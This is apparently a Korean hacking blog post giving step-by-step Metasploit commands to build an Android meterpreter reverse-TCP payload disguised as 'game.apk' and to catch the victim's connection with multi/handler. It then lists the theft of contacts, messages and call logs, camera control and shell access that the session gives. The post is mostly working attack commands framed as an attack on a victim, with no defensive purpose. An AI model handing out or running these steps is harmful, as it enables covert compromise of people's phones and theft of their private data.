1. kali linux 실행
#msfconsole
2. msfpayload(reverse tcp)
#msfpayload android/meterpreter/reverse_tcp LHOST=192.168.102.128 LPORT=4444 R > game.apk
(msfpayload android/meterpreter/reverse_tcp LHOST=your ip LPORT=anything port R > xxx.apk)
위의 명령을 입력하면 game.apk라는 앱이 생성된다. 이를 희생자 apk에 설치한다.
LHOST는 자신의 IP를 입력하여야 한다. 그러면 희생자는 LHOST 및 해당 포트에 연결된다.
해당 앱을 분석해보면
를 확인해 볼 수 있다.
msf>use multi/handler
msf>set PAYLOAD android/meterpreter/reverse_tcp
msf>set LHOST 192.168.102.128
msf>set LPORT 4444
msf> show options
잘 된 것을 확인할 수 있다.
msf>exploit
희생자 안드로이드를 기다리게 된다...
안드로이드가 붙으면 세션이 open된다.
meterpreter > sysinfo //안드로이드 시스템정보 확인
그밖에 루팅된 단말인지 확인
전화번호부 탈취, 메시지 탈취, 통화기록 탈취
카메라 제어(동영상 촬영도 됨.....)
안드로이드 shell 사용
등등 기능 많음
시간 관계상 각각의 기능은 추후 업데이트 예정
반응형
'해킹 > 해킹' 카테고리의 다른 글
해킹의 첫걸음. 풋프린팅(footprinting) (0) | 2016.01.19 |
---|---|
자바 swt를 활용한 안드로이드 해킹 (0) | 2015.08.27 |
kali metasploit 소개 (0) | 2015.08.27 |
kali sslstrip을 이용한 HTTPS 도청 (0) | 2015.08.27 |
kali ettercap을 활용한 패스워드 도청 (1) | 2015.08.27 |